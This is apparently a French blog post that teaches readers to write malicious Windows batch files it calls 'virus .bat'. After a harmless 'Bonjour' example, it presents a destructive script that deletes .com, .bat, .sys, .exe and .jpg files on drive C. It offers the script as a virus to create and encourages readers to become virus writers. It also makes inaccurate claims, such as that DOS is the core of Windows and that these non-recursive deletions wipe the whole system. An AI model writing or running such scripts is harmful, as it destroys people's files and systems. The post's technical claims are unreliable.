Un virus .bat est programmé en DOS. le DOS est un langage très simple pour faire de petites applications pour Windows. Bien que n'étant pas si riche du fait qu'il manque d'interface graphique, le DOS est le principal élément du fonctionnement de Windows (en bref, son cœur). Il peut beaucoup faire, jusqu'à détruire tout Windows, rien qu'en une fraction de secondes.

Pour cette section, je vous partagerai plusieurs connaissances en plusieurs articles  qui pourront peut-être vous servir dans beaucoup de choses.
Surtout, n'oubliez pas de vous abonner sur ma chaîne Youtube: '' https://www.youtube.com/channel/UCsc93p2MOkAnKg59ZENcT-w '' et ma page Facebook.

Le vif du sujet Sujet:

Un programme BATCH est une suite d'exécutions MS-DOS,et ne se compose que d'éléments qui sont des ordres qui s'exécutent les un après les autres.

Nous pouvons beaucoup faire avec le DOS. Mais ici, nous allons le plus nous consacrer à faire petits programmes malveillants que nous pouvons appeler: Virus BAT. J'ai l’habitude de les appeler des ''virus-niveau1'', parce qu’il ne sont pas vraiment des virus, mais au moins peuvent beaucoup plus détruire que des vrais virus.

Comment Créer des Virus Bat?

Pour les créer (ces Virus-Bat), il faut tout d'abord avoir un éditeur de texte (bien évidemment xD ), comme plus connus: Bloc-notes et Notepad;
Ensuite, savoir coder en DOS.

Un fichier BATCH avec l'extension ''.bat'' est un programme qui commence toujours par @echo off ensuite les autres instructions ou ordres.

Dans le prochains articles, je vous donnerai une liste des commandes BATCH les plus utilisées.

Exemple d'un fichier .bat qui dit 'bonjour':

@echo off
echo Bonjour
pause

Enregistrer ce fichier avec un nom quelconque au format ".bat" puis faites un double-clic.

Un Exemple de virus que vous pouvez faire avec:

@echo off
del c:*.com
del c:*.bat
del c:*.sys
del c:*.exe
del c:*.jpg


Ce virus va automatiquement supprimer tous fichiers .com, .sys, toutes les images JPG et tous logiciels ou applis compilés de Windows dans le disque C. En bref, il détruit le système parce que Windows ne peut pas fonctionner sans ces fichiers.

J’espère que l'article vous a plu, que vous deviendrez un virus-batcheur-man et que vous reviendrez pour voir plus.
Toujours 242